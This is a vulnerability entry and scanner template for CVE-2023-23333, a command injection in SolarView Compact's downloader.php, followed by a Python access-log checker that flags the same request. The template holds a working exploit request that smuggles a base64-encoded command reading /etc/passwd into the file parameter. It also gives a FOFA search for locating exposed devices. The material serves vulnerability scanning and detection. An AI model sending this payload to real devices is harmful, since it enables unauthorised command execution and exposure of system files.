Vulnerability description
SolarView Compact through 6.00 contains a command injection vulnerability: attackers can execute commands by bypassing internal restrictions through downloader.php.
FOFA: SolarView Compact
id: CVE-2023-23333

info:
  name: SolarView downloader.php rce
  author: zan8in,zhizho
  severity: critical
  verified: true
  description: |
    There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.
    FOFA: SolarView Compact
  reference:
    - https://github.com/Timorlover/CVE-2023-23333
    - https://mp.weixin.qq.com/s/2aaL3Bh1gzYGTqKQXNh46A
  tags: cve,cve2023,rce,solarview
  created: 2023/06/15

set:
  hostname: request.url.host
rules:
  r0:
    request:
      raw: |
        GET /downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==%7Cbase64%20-d%7Cbash%00.zip HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()
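
A defender-side check for the request pattern in the template above, as an added example that is not part of the original template: it scans web-server access logs for downloader.php requests whose decoded file parameter carries shell metacharacters, a NUL byte or a base64 decode pipe. The combined-log format, the sample lines (including the benign file name) and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')

# Constructed heuristics: content a download file name should never carry.
CHECKS = {
    "shell-metacharacter": re.compile(r"[;|&`$()<>\n]"),
    "nul-byte": re.compile(r"\x00"),
    "base64-decode-pipe": re.compile(r"base64\s+(-d|--decode)"),
}

def inspect_line(log_line):
    """Return sorted reasons why a downloader.php request looks like injection."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    target = urlsplit(match.group(1))
    if not target.path.lower().endswith("/downloader.php"):
        return []
    reasons = set()
    # Split on "&" only, so a ";" inside the value is never treated as a separator.
    for pair in target.query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name) != "file":
            continue
        decoded = unquote_plus(value)  # %7C -> "|", %00 -> NUL, %20 -> space
        reasons.update(label for label, rx in CHECKS.items() if rx.search(decoded))
    return sorted(reasons)

# Constructed sample access-log lines (documentation IP range 192.0.2.0/24).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jun/2023:10:00:00 +0000] "GET /downloader.php?file=report_2023.zip HTTP/1.1" 200 5120',
    '192.0.2.77 - - [15/Jun/2023:10:00:05 +0000] "GET /downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==%7Cbase64%20-d%7Cbash%00.zip HTTP/1.1" 200 1843',
    '192.0.2.10 - - [15/Jun/2023:10:00:09 +0000] "GET /index.php?file=a;b HTTP/1.1" 200 300',
]

def scan(lines):
    """Return (line_number, reasons) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        reasons = inspect_line(line)
        if reasons:
            hits.append((number, reasons))
    return hits

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```

A 200 response on a flagged line only means the request was served; whether the command ran has to be confirmed from the device itself.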